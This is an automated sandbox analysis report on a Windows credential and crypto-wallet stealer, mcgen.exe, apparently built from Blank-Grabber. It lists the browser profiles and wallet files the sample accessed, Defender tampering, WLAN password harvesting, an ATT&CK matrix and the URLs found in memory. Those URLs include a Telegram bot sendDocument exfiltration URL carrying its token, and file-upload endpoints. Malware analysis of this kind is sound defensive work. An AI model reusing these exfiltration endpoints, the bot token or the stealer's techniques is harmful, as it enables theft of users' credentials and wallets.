              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: Yara matchFile source: 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mcgen.exe PID: 7020, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000000.00000003.2124495523.0000024512162000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2519812485.000002C54FAC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2124495523.0000024512164000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2531278719.000002C54FC26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mcgen.exe PID: 3212, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mcgen.exe PID: 7020, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI32122\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: mcgen.exe PID: 7020, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              File and Directory Permissions Modification
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts2
              Native API
              2
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              4
              Disable or Modify Tools
              LSASS Memory2
              File and Directory Discovery
              Remote Desktop Protocol3
              Data from Local System
              1
              Ingress Tool Transfer
              Exfiltration Over Bluetooth1
              System Shutdown/Reboot
              Email AddressesDNS ServerDomain Accounts222
              Command and Scripting Interpreter
              Logon Script (Windows)11
              Process Injection
              11
              Deobfuscate/Decode Files or Information
              Security Account Manager48
              System Information Discovery
              SMB/Windows Admin Shares1
              Clipboard Data
              21
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell
              Login Hook2
              Registry Run Keys / Startup Folder
              21
              Obfuscated Files or Information
              NTDS251
              Security Software Discovery
              Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Software Packing
              LSA Secrets2
              Process Discovery
              SSHKeylogging4
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Timestomp
              Cached Domain Credentials141
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Modify Registry
              Proc Filesystem11
              Remote System Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
              Virtualization/Sandbox Evasion
              /etc/passwd and /etc/shadow11
              System Network Configuration Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              Access Token Manipulation
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
              Process Injection
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583242 Sample: mcgen.exe Startdate: 02/01/2025 Architecture: WINDOWS Score: 100 67 api.telegram.org 2->67 69 blank-q0y5l.in 2->69 71 ip-api.com 2->71 85 Suricata IDS alerts for network traffic 2->85 87 Found malware configuration 2->87 89 Sigma detected: Capture Wi-Fi password 2->89 93 13 other signatures 2->93 11 mcgen.exe 22 2->11         started        signatures3 91 Uses the Telegram API (likely for C&C communication) 67->91 process4 file5 55 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->55 dropped 57 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->57 dropped 59 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->59 dropped 61 16 other files (none is malicious) 11->61 dropped 113 Modifies Windows Defender protection settings 11->113 115 Adds a directory exclusion to Windows Defender 11->115 117 Tries to harvest and steal WLAN passwords 11->117 119 2 other signatures 11->119 15 mcgen.exe 1 90 11->15         started        signatures6 process7 dnsIp8 73 ip-api.com 208.95.112.1, 49718, 49888, 80 TUT-ASUS United States 15->73 75 api.telegram.org 149.154.167.220, 443, 49894 TELEGRAMRU United Kingdom 15->75 77 Found many strings related to Crypto-Wallets (likely being stolen) 15->77 79 Tries to harvest and steal browser information (history, passwords, etc) 15->79 81 Modifies Windows Defender protection settings 15->81 83 6 other signatures 15->83 19 cmd.exe 1 15->19         started        22 cmd.exe 1 15->22         started        24 cmd.exe 15->24         started        26 36 other processes 15->26 signatures9 process10 signatures11 95 Suspicious powershell command line found 19->95 97 Uses ping.exe to sleep 19->97 99 Uses cmd line tools excessively to alter registry or file data 19->99 111 4 other signatures 19->111 28 powershell.exe 23 19->28         started        31 conhost.exe 19->31         started        101 Modifies Windows Defender protection settings 22->101 103 Removes signatures from Windows Defender 22->103 33 powershell.exe 22 22->33         started        43 2 other processes 22->43 105 Adds a directory exclusion to Windows Defender 24->105 35 powershell.exe 24->35         started        37 conhost.exe 24->37         started        107 Encrypted powershell cmdline option found 26->107 109 Tries to harvest and steal WLAN passwords 26->109 39 getmac.exe 26->39         started        41 systeminfo.exe 26->41         started        45 70 other processes 26->45 process12 file13 121 Loading BitLocker PowerShell Module 28->121 123 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 39->123 125 Writes or reads registry keys via WMI 39->125 63 C:\Users\user\AppData\...\ppw2wipr.cmdline, Unicode 45->63 dropped 65 C:\Users\user\AppData\Local\Temp\WiSkp.zip, RAR 45->65 dropped 48 csc.exe 45->48         started        signatures14 process15 file16 53 C:\Users\user\AppData\Local\...\ppw2wipr.dll, PE32 48->53 dropped 51 cvtres.exe 48->51         started        process17

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              mcgen.exe44%VirustotalBrowse
              mcgen.exe47%ReversingLabsWin64.Trojan.Generic
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI32122\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32122\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32122\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32122\_decimal.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32122\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32122\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32122\_queue.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32122\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32122\_sqlite3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32122\_ssl.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32122\libcrypto-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32122\libffi-8.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32122\libssl-3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32122\python313.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32122\select.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32122\sqlite3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI32122\unicodedata.pyd0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://api.anonfiles.com/upload0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              ip-api.com
              208.95.112.1
              truefalse
                high
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  blank-q0y5l.in
                  unknown
                  unknowntrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/bot7770343182:AAFH0EKMbwNwFcAUN5qW8m0OzxUEjm5sVvs/sendDocumentfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabmcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://github.com/Blank-c/BlankOBFmcgen.exe, 00000002.00000003.2141215194.000002C54E544000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141280014.000002C54E521000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2140715336.000002C54E583000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2140947833.000002C54EBE0000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141430894.000002C54E540000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://www.avito.ru/mcgen.exe, 00000002.00000002.2529086772.000002C54F060000.00000004.00001000.00020000.00000000.sdmpfalse
                            high
                            https://duckduckgo.com/ac/?q=mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://api.telegram.org/botmcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://github.com/Blank-c/Blank-Grabberimcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://crl.microsoftpowershell.exe, 0000003E.00000002.2398861499.000001FC55CF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://www.ctrip.com/mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpfalse
                                      high
                                      http://www.microsoft.copowershell.exe, 0000000B.00000002.2303077400.0000020A5B9AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#mcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://www.leboncoin.fr/mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmpfalse
                                            high
                                            https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-filemcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://tools.ietf.org/html/rfc2388#section-4.4mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64mcgen.exe, 00000002.00000002.2525937902.000002C54E1F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://weibo.com/mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    high
                                                    https://api.anonfiles.com/uploadmcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://packaging.python.org/en/latest/specifications/entry-points/#file-formatmcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.msn.commcgen.exe, 00000002.00000002.2529691866.000002C54F58F000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2529086772.000002C54F148000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        high
                                                        https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.2277416389.0000020A53250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2321464313.000001FC3F48A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2390633772.000001FC4DB97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2390633772.000001FC4DCD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://discord.com/api/v9/users/mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963mcgen.exe, 00000002.00000002.2528733144.000002C54ED10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              high
                                                              http://cacerts.digimcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://peps.python.org/pep-0205/mcgen.exe, 00000002.00000002.2526365039.000002C54E3FE000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2127861413.000002C54E191000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drfalse
                                                                  high
                                                                  https://github.com/Blank-c/Blank-Grabberr%mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.reddit.com/mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000B.00000002.2207068947.0000020A431E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2321464313.000001FC3DB21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenamemcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxymcgen.exe, 00000002.00000002.2528839901.000002C54EE30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688mcgen.exe, 00000002.00000002.2525383234.000002C54E014000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.ebay.co.uk/mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000003E.00000002.2321464313.000001FC3F404000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000B.00000002.2207068947.0000020A4340A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.ebay.de/mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000003E.00000002.2321464313.000001FC3F404000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codemcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://go.micropowershell.exe, 0000003E.00000002.2321464313.000001FC3E755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readermcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.amazon.com/mcgen.exe, 00000002.00000002.2529086772.000002C54F088000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://github.com/python/cpython/issues/86361.mcgen.exe, 00000002.00000002.2525937902.000002C54E1F3000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2144496528.000002C54E8F5000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2144379299.000002C54E955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://crl.micpowershell.exe, 0000000B.00000002.2303077400.0000020A5B9AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://contoso.com/Iconpowershell.exe, 0000003E.00000002.2390633772.000001FC4DCD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://httpbin.org/mcgen.exe, 00000002.00000003.2407347267.000002C54EACA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0smcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_modulemcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesmcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.ecosia.org/newtab/mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brmcgen.exe, 00000002.00000003.2260291841.000002C54EAEC000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2242671922.000002C54EB80000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2256093208.000002C54EB80000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2248894895.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2259875659.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2256093208.000002C54EAEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.youtube.com/mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://allegro.pl/mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://github.com/Pester/Pesterpowershell.exe, 0000003E.00000002.2321464313.000001FC3F404000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535mcgen.exe, 00000002.00000002.2527033643.000002C54E9A7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_symcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://MD8.mozilla.org/1/mmcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadatamcgen.exe, 00000002.00000002.2528839901.000002C54EE30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.bbc.co.uk/mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://ip-api.com/line/?fields=hostingrmcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://bugzilla.momcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://github.com/python/importlib_metadata/wiki/Development-Methodologymcgen.exe, 00000002.00000002.2528946211.000002C54EF54000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYtmcgen.exe, 00000002.00000003.2248894895.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2259875659.000002C54EBB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://tools.ietf.org/html/rfc6125#section-6.4.3mcgen.exe, 00000002.00000002.2528946211.000002C54EF54000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000B.00000002.2207068947.0000020A4340A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://google.com/mailmcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://packaging.python.org/specifications/entry-points/mcgen.exe, 00000002.00000002.2528733144.000002C54ED10000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2528946211.000002C54EF54000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.python.org/psf/license/)mcgen.exe, 00000002.00000002.2535253168.00007FFD94659000.00000040.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pymcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.google.com/mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.iqiyi.com/mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://api.telegram.org/bot7770343182:AAFH0EKMbwNwFcAUN5qW8m0OzxUEjm5sVvs/sendDocument0mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://foss.heptapod.net/pypy/pypy/-/issues/3539mcgen.exe, 00000002.00000002.2528733144.000002C54ED10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://google.com/mcgen.exe, 00000002.00000002.2527033643.000002C54E950000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://api.gofile.io/getServerrmcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://ocsp.sectigo.com0mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://tools.ietf.org/html/rfc7231#section-4.3.6)mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://contoso.com/Licensepowershell.exe, 0000003E.00000002.2390633772.000001FC4DCD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://discordapp.com/api/v9/users/mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourcemcgen.exe, 00000002.00000002.2525383234.000002C54E014000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://ip-api.com/json/?fields=225545rmcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specmcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
